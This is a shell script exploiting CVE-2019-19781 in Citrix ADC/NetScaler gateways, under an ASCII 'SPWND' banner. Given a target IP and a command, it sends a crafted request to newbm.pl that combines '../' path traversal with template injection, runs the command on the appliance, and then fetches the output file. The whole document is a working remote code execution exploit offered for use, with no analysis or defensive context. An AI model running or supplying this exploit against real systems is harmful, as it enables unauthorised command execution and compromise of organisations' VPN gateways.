#!/bin/ashecho "--------------------------------------------███████╗██████╗

1. #!/bin/ash
2. echo "--------------------------------------------
3. ███████╗██████╗ ██╗    ██╗███╗   ██╗██████╗
4. ██╔════╝██╔══██╗██║    ██║████╗  ██║██╔══██╗
5. ███████╗██████╔╝██║ █╗ ██║██╔██╗ ██║██║  ██║
6. ╚════██║██╔═══╝ ██║███╗██║██║╚██╗██║██║  ██║
7. ███████║██║     ╚███╔███╔╝██║ ╚████║██████╔╝
8. ╚══════╝╚═╝      ╚══╝╚══╝ ╚═╝  ╚═══╝╚═════╝
9. --------------------------------------------"
10. if [ -z "$1" ];
11. then
12.     echo -ne 'Usage : ash CVE-2019-19781.sh IP CMD\n'
13.     exit;
14. fi
15.  
16. filenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);
17. curl --insecure -s -k "https://$1/vpn/../vpns/portal/scripts/newbm.pl" -d "url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'$2 | tee /netscaler/portal/templates/$filenameid.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb" -H "NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid" -H 'NSC_NONCE: spwnd11' -H 'Content-type:
18. application/x-www-form-urlencoded' --path-as-is
19. echo -ne "\n" ;curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -s -H "NSC_NONCE: spwnd11" -H "NSC_USER: spwnd11" --path-as-is
20. echo -ne "Command Output :\n"
21. curl --insecure -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -H "NSC_NONCE: spwnd11" -H "NSC_USER: spwnd11" --path-as-is